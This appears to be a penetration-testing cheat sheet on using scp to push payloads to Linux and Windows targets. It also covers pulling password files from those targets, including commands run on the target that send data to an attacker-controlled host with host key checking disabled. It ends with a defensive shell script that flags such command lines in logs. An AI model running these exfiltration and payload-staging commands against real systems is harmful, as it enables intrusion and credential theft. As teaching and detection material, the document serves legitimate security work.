SCP
SCP Syntax Review
The most fundamental syntax for using scp is this:
# Password Authentication
# -----------------------
# Transfer from Local to Remote
scp [local-path] [username]@[target-ip]:[remote-path]
# Transfer from Remote to Local
scp [username]@[target-ip]:[remote-path] [local-path]
# Private Key Authentication
# --------------------------
# Transfer from Local to Remote
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [local-path] [username]@[target-ip]:[remote-path]
# Transfer from Remote to Local
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [username]@[target-ip]:[remote-path] [local-path]
Linux Target Running SSH Server
From Attack Box
- Transfer a payload from /tmp/payload on the Attack Box to /tmp/pwnz on the target
Password Authentication
scp /tmp/payload johndoe@target-ip:/tmp/pwnz
Private Key Authentication
- You have obtained a private key for the johndoe user on the target
- You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe /tmp/payload johndoe@target-ip:/tmp/pwnz
To Attack Box
- You want to transfer /home/johndoe/passwords.txt to /tmp/passwords.txt on your Attack Box
- Run these commands on Attack Box and authenticate as johndoe on the target
Password Authentication
scp johndoe@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt
Private Key Authentication
- You have obtained a private key for the johndoe user on the target
- You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt
Windows Target Running SSH Server
From Attack Box
- Transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
- Run these commands on Attack Box and authenticate as johndoe on the target
Password Authentication
scp /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/
Private Key Authentication
- You have obtained a private key for the johndoe user on the target
- You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/
To Attack Box
- You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /tmp/passwords.txt on the Attack Box
- Run these commands on Attack Box and authenticate as johndoe on the target
Password Authentication
scp johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/
Private Key Authentication
- You have obtained a private key for the johndoe user on the target
- You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/
Attack Box Running SSH Server
- Create a junk user account on your attack box
- Create an SSH key pair
- Add the public key string to /home/junkuser/.ssh/authorized_keys
- Transfer the private key to the target
- Run one of the commands below
- Destroy the authentication mechanism!
  - Don't leave access to your attack box on the host
  - Do one of the following (or both):
    - Delete the private key off the target: rm -rf /path/to/privatekey
    - Delete the junkuser account from the attack box: sudo userdel -rf junkuser
Windows Target
- SSH private key for junkuser account on Attack Box is stored at C:\Windows\Temp\junk-key.pem
From Attack Box
- You want to transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
- You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload.exe C:\Windows\Temp\
To Attack Box
- You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /home/junkuser/ on the Attack Box
- You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem C:\Users\JohnDoe\Desktop\passwords.txt junkuser@attack-box-ip:/home/junkuser/
Linux Target
- SSH private key for junkuser account on Attack Box is stored at /tmp/junk-key.pem
From Attack Box
- You want to transfer a payload from /home/junkuser/payload on the Attack Box to /tmp/ on the target
- You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload /tmp/
To Attack Box
- You want to transfer /home/johndoe/passwords.txt to /home/junkuser/ on the Attack Box
- You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem /home/johndoe/passwords.txt junkuser@attack-box-ip:/home/junkuser/
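From the defender's side, the commands run on the target in this section share a recognizable shape: scp invoked with StrictHostKeyChecking=no and an identity file loaded from a temp directory. The following is an added example, not part of the original page, that flags such command lines in exported process logs. The function names, the extra temp paths (/var/tmp, /dev/shm) and the sample log lines (documentation address 198.51.100.7) are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): flag scp command lines that
# disable host key checking AND load an identity file from a temp directory.
# Input on stdin: one process command line per line (e.g. auditd/Sysmon export).
flag_scp() {
  awk '{
    orig = $0
    gsub(/"/, "")                          # drop quotes; awk re-splits fields
    m = split($1, p, /[\\\/]/)             # basename of the executable
    bin = tolower(p[m])
    if (bin != "scp" && bin != "scp.exe") next
    nohk = 0; key = ""; last = ""
    for (i = 2; i <= NF; i++) {
      opt = $i
      if (opt == "-o" && i < NF) opt = "-o" $(++i)   # join -o with its value
      if (tolower(opt) ~ /^-ostricthostkeychecking=(no|off)$/) nohk = 1
      else if (opt == "-i" && i < NF) key = $(++i)
      else if (opt !~ /^-/) last = opt     # final operand is the destination
    }
    k = tolower(key)
    tmp = (k ~ /^\/(tmp|var\/tmp|dev\/shm)\// || k ~ /^[a-z]:\\windows\\temp\\/)
    # a destination of the form user@host:path means data leaves this host
    dir = (last ~ /^[^@:\/\\]+@[^:]+:/) ? "upload" : "download"
    if (nohk && tmp) printf "%s\tkey=%s\t%s\n", dir, key, orig
  }'
}

# Constructed sample log lines (hosts, users and paths are illustrative).
sample_log() {
  cat <<'EOF'
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem /home/johndoe/passwords.txt junkuser@198.51.100.7:/home/junkuser/
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem junkuser@198.51.100.7:/home/junkuser/payload.exe C:\Windows\Temp\
/usr/bin/scp -i /home/alice/.ssh/id_ed25519 report.pdf alice@files.example.internal:/srv/reports/
rsync -a /var/www backup@files.example.internal:/srv/backup/
EOF
}

sample_log | flag_scp
```

Requiring both conditions keeps routine administrative scp use, such as the third sample line, out of the results.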